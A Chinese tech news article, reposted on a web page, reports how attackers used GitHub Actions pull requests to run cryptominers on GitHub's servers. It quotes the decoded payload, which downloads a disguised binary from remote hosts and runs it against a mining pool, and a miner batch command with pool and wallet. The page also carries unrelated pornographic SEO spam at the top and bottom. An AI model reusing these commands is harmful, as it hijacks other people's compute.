成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

新聞 黑客攻防
黑客們動(dòng)起了歪心思——“白嫖”服務(wù)器。給PC植入挖礦木馬,已經(jīng)無法滿足黑客日益增長(zhǎng)的算力需求,如果能用上GitHub的服務(wù)器,還不花錢,那當(dāng)然是極好的。

 

本文經(jīng)AI新媒體量子位(公眾號(hào)ID:QbitAI)授權(quán)轉(zhuǎn)載,轉(zhuǎn)載請(qǐng)聯(lián)系出處。

加密貨幣價(jià)格一路高漲,顯卡又買不起,怎么才能“廉價(jià)”挖礦?

黑客們動(dòng)起了歪心思——“白嫖”服務(wù)器。

給PC植入挖礦木馬,已經(jīng)無法滿足黑客日益增長(zhǎng)的算力需求,如果能用上GitHub的服務(wù)器,還不花錢,那當(dāng)然是極好的。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

而且整個(gè)過程可能比侵入PC還容易,甚至都不需要程序員上當(dāng)受騙。只需提交Pull Request(PR),即使項(xiàng)目管理者沒有批準(zhǔn),惡意挖礦代碼依然能夠執(zhí)行。

原理也很簡(jiǎn)單,利用GitHub Action的自動(dòng)執(zhí)行工作流功能,輕松將挖礦程序運(yùn)行在GitHub的服務(wù)器上。

早在去年11月,就已經(jīng)有人發(fā)現(xiàn)黑客這種行為。更可怕的是,半年過去了,這種現(xiàn)象依然沒得到有效制止。

GitHub心里苦啊,雖然可以封禁違規(guī)賬號(hào),但黑客們玩起了“游擊戰(zhàn)術(shù)”,不斷更換馬甲號(hào)逃避“追捕”,讓官方疲于奔命。

就在幾天前,一位荷蘭的程序員還發(fā)現(xiàn),這種攻擊方式依然存在,甚至代碼里還出現(xiàn)了中文。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

那么,這些黑客是如何植入挖礦程序的呢?一切要從發(fā)現(xiàn)異常的法國(guó)程序員Tib說起。

PR異常讓程序員起疑心

去年11月,Tib發(fā)現(xiàn),自己在一個(gè)沒有參加的repo上收到了PR請(qǐng)求。而且在14個(gè)小時(shí)內(nèi)就收到了7個(gè),全是來自一個(gè)“y4ndexhater1”的用戶,沒有任何描述內(nèi)容。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

令人感到奇怪的是,這并不是一個(gè)熱門項(xiàng)目,Star數(shù)量為0。

[[392450]]

打開項(xiàng)目主頁發(fā)現(xiàn),內(nèi)容是Perl項(xiàng)目的github action、circle ci、travis-ci示例代碼集合,整個(gè)README文檔一團(tuán)糟,根本不像一個(gè)正經(jīng)的開源項(xiàng)目。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

然而就是這個(gè)混亂又冷門的repo,居然在3天里被fork了2次。

一切都太不正常了,讓人嗅到了一絲不安的氣息。

嘗試“作死”運(yùn)行

本著“作死”的精神,Tib決定一探究竟。

經(jīng)過那位可疑用戶的操作,Tib所有的action都被刪除,在工作流里被加入了一個(gè)ci.yml文件,內(nèi)容如下:

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

當(dāng)Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt這一行內(nèi)容后,立刻從沙發(fā)上跳了起來,他意識(shí)到事情的嚴(yán)重性:有人在入侵他的GitHub個(gè)人資料!

這串看似神秘的字符,其實(shí)是base64編碼,經(jīng)過翻譯后,得到了另一段代碼:

apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')
chmod u+x prog
timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

前面兩行不必解釋,有意思的地方從第三行開始,它會(huì)下載一個(gè)prog二進(jìn)制文件。

為了安全起見,Tib先嘗試獲取信息而不是執(zhí)行,得到了它的十六進(jìn)制代碼。

$ objdump -s --section .comment prog
prog: file format elf64-x86-64
Contents of section .comment:
0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.
0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1
0020 20323032 30313230 3300 20201203.

Tib也考慮過反編譯,但是沒有成功。

不入虎穴,焉得虎子,Tib決定嘗試運(yùn)行一下。

要執(zhí)行這一大膽而又作死的任務(wù),防止“試試就逝世”,Tib首先斷開了電腦的網(wǎng)絡(luò)鏈接,并選擇在Docker容器中運(yùn)行。

答案終于揭曉,原來這個(gè)prog是一個(gè)名為XMRig的挖礦程序。

$ ./prog --version
XMRig 6.8.1
built on Feb 3 2021 with GCC 10.2.1
features: 64-bit AES
libuv/1.40.0
OpenSSL/1.1.1i
hwloc/2.4.0

當(dāng)時(shí)XMRig的最新版恰好是6.8.1,和上面的版本參數(shù)符合。不過用SHA256檢測(cè)后發(fā)現(xiàn),這個(gè)prog并不完全是XMRig,Tib預(yù)測(cè)它可能是一個(gè)修改版。

實(shí)際上,可能被攻擊的不止GitHub,安全公司Aqua推測(cè),像Docker Hub、Travis CI、Circle CI這些SaaS軟件開發(fā)環(huán)境,都可能遭受這類攻擊。

在這個(gè)攻擊過程中,會(huì)派生一個(gè)合法的repo,負(fù)責(zé)將惡意的GitHub Action添加到原始代碼。然后,黑客再向原始repo提交一個(gè)PR,將代碼合并回原始repo。

下載的挖礦程序會(huì)偽裝成prog或者gcc編譯器,通過提交PR在項(xiàng)目執(zhí)行自動(dòng)化工作流。此時(shí)服務(wù)器將運(yùn)行偽裝后的挖礦程序。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

這些攻擊者僅一次攻擊就可以運(yùn)行多達(dá)100個(gè)挖礦程序,從而給GitHub的服務(wù)器帶來了巨大的計(jì)算量。

據(jù)Aqua估計(jì),僅在三天的時(shí)間里,挖礦黑客就在GitHub上有超過2.33萬次commit、在Docker Hub上5.8萬次build,轉(zhuǎn)化了大約3萬個(gè)挖礦任務(wù)。

可以防范但很難根除

這種攻擊甚至不需要被攻擊的倉(cāng)庫(kù)管理者接受惡意Pull Request。

只要在.github/workflows目錄里面的任意.yml文件中配置了在收到Pull Request時(shí)執(zhí)行,來自黑客的Action就會(huì)自動(dòng)被執(zhí)行。

如果你沒有使用這個(gè)功能,那就不用擔(dān)心啦,黑客大概也不會(huì)找上你。

需要用到這個(gè)功能的話,可以設(shè)置成只允許本地Action或只允許Github官方及特定作者創(chuàng)建的Action。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

將情況反饋給客服后,GitHub會(huì)對(duì)惡意賬號(hào)進(jìn)行封號(hào)和關(guān)閉相關(guān)Pull Request的操作。

但惡意攻擊很難被根除,黑客只需要注冊(cè)新的賬號(hào)就可以繼續(xù)白嫖服務(wù)器資源。

攻擊還在繼續(xù)

我們從最近一次攻擊中發(fā)現(xiàn),黑客將挖礦程序上傳到GitLab并偽裝成包管理工具npm。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

打開這個(gè)可疑的nani.bat,可以看到:

npm.exe --algorithm argon2id_chukwa2
--pool turtlecoin.herominers.com:10380
--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
--password xo

這一次黑客挖的是烏龜幣*(TurtleCoin)*,可使用CPU計(jì)算。按當(dāng)前價(jià)格挖出四千多個(gè)幣才值1美元。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

Github Actions的免費(fèi)服務(wù)器可以提供英特爾E5 2673v4的兩個(gè)核心,7GB內(nèi)存。

大致估算單臺(tái)運(yùn)行一天只能獲利幾美分,而且黑客的挖礦程序通常只能在被發(fā)現(xiàn)之前運(yùn)行幾個(gè)小時(shí)。比如Docker Hub就把自動(dòng)build的運(yùn)行時(shí)間限制在2個(gè)小時(shí)。

不過蚊子再小也是肉,黑客通過尋找更多接受公開Action的倉(cāng)庫(kù)以及反復(fù)打開關(guān)閉Pull Request就能執(zhí)行更多的挖礦程序。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

△同一黑客賬號(hào)至少攻擊了95個(gè)GitHub倉(cāng)庫(kù)

正如Twitter用戶Dave Walker所說的,如果你提供免費(fèi)的計(jì)算資源,就要做好會(huì)被攻擊和濫用的覺悟。挖礦有利可圖的情況下這是不可避免的。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

據(jù)報(bào)道,受害的不止GitHub,還有Docker Hub、Travis CI以及Circle CI等提供類似服務(wù)的持續(xù)集成平臺(tái)。

這一亂象不知何時(shí)才能結(jié)束,唯一的好消息可能就是,挖礦的黑客似乎只是針對(duì)GitHub提供的服務(wù)器資源,而不會(huì)破壞你的代碼。

但是GitHub Action的漏洞不止這一個(gè)。還有方法能使黑客讀寫開發(fā)者的倉(cāng)庫(kù),甚至可以讀取加密的機(jī)密文件。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個(gè)任務(wù),代碼驚現(xiàn)中文

去年7月,Google Project Zero團(tuán)隊(duì)就已向GitHub通報(bào)漏洞。但在給出的90天修復(fù)期限+延長(zhǎng)14天后,GitHub仍未能有效解決。

對(duì)此,我們的建議是,不要輕易相信GitHub市場(chǎng)里的Action作者,不要交出你的密匙。

 

 

責(zé)任編輯:張燕妮 來源: 量子位
相關(guān)推薦

2021-04-20 09:36:49

黑客網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2023-09-12 14:40:41

2012-12-14 10:00:06

2009-09-01 13:34:08

IIS0dayWindows

2010-05-12 16:38:09

2021-03-08 10:00:54

黑客電子郵件網(wǎng)絡(luò)攻擊

2022-04-24 14:11:26

病毒僵尸網(wǎng)絡(luò)網(wǎng)絡(luò)攻擊

2021-04-27 19:23:47

服務(wù)器工具redis

2013-09-04 10:01:15

2009-03-30 12:32:28

2021-03-12 09:50:08

曙光

2009-03-09 17:30:00

2016-02-26 15:37:05

2020-03-16 14:39:44

服務(wù)器開發(fā)工具

2011-07-05 13:40:29

刀片服務(wù)器戴爾

2015-01-04 09:22:58

2021-10-24 08:24:34

WinRAR遠(yuǎn)程代碼漏洞

2010-07-06 09:39:37

2013-03-26 11:11:38

Windows Blu文件管理器

2021-03-30 08:43:29

黑客PHP團(tuán)隊(duì)Git
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 男人的天堂久久 | 天天爽一爽 | 羞羞视频免费观 | 日韩电影免费在线观看中文字幕 | 亚洲成人一区二区 | 亚洲精品3 | 亚洲精品一区中文字幕乱码 | 断背山在线观看 | 国产日韩欧美在线 | 日韩黄色av| 午夜不卡一区二区 | 欧美日韩综合视频 | 91精品国产高清久久久久久久久 | 日韩av成人在线观看 | 国产成人精品一区二区三区 | 99精品视频在线 | 国产91精品久久久久久久网曝门 | 久久国产免费 | 欧美在线日韩 | 成人免费淫片aa视频免费 | 99视频久 | а_天堂中文最新版地址 | 久久精品亚洲精品国产欧美 | 久久精品国产一区老色匹 | 玩丰满女领导对白露脸hd | 7777在线视频| 黄片毛片 | 黄色大片免费网站 | 亚洲精品久久久9婷婷中文字幕 | 久久99国产精一区二区三区 | 亚洲免费一区二区 | 精品视频成人 | 激情福利视频 | 一区在线视频 | 一区二区av | 欧美精品在线观看 | 一片毛片 | 美国一级片在线观看 | 日韩一级欧美一级 | 日本超碰在线 | 91中文在线观看 |